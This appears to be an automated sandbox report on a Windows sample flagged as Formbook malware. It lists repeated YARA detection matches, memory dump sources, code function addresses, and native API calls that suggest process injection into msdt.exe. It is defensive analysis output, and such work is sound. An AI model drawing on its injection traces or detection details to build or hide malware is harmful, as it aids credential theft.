Source: Yara match, File source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: HkE0tD0g4NXKJfy.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 0_2_00C15C24
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 0_2_013D8250
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 0_2_013DD2F8
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 0_2_013DD2E8
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_00401030
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_0041BA02
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_00408C7C
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_0041CC38
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_00408C80
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_0041C529
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_0041BD30
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_00402D87
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_00402D90
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_00402FB0
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_00E65C24
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_018EF900
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01904120
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_018FB090
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019120A0
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019B20A8
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019B28EC
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019A1002
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_0191EBB0
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019ADBD2
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019B2B28
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019B22AE
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01912581
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019B25DD
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_018FD5E0
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019B2D07
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_018E0D20
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019B1D55
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_018F841F
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019AD466
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019B1FF1
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019B2EF7
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019AD616
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01906E30
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047ED466
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_0473841F
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047F1D55
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04720D20
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047F2D07
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_0473D5E0
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047F25DD
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04752581
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04746E30
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047ED616
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047F2EF7
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047F1FF1
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047E1002
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047F28EC
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047520A0
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047F20A8
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_0473B090
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04744120
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_0472F900
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047F22AE
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047F2B28
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047EDBD2
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_0475EBB0
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_02D02FB0
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_02D08C80
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_02D08C7C
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_02D1CC38
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_02D02D90
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_02D02D87
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: String function: 018EB150 appears 35 times
Source: C:\Windows\SysWOW64\msdt.exe; Code function: String function: 0472B150 appears 35 times
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_004185E0 NtCreateFile
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_00418690 NtReadFile
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_00418710 NtClose
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_004187C0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_004185DA NtCreateFile
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_0041873A NtReadFile
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_004187BC NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019299A0 NtCreateSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019298F0 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929840 NtDelayExecution, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929A00 NtProtectVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929A20 NtResumeThread, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929A50 NtCreateFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019295D0 NtClose, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929540 NtReadFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019297A0 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929FE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019296E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019299D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929950 NtQueueApcThread
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019298A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929820 NtEnumerateKey
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_0192B040 NtSuspendThread
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_0192A3B0 NtGetContextThread
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929B00 NtSetValueKey
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929A80 NtOpenDirectoryObject
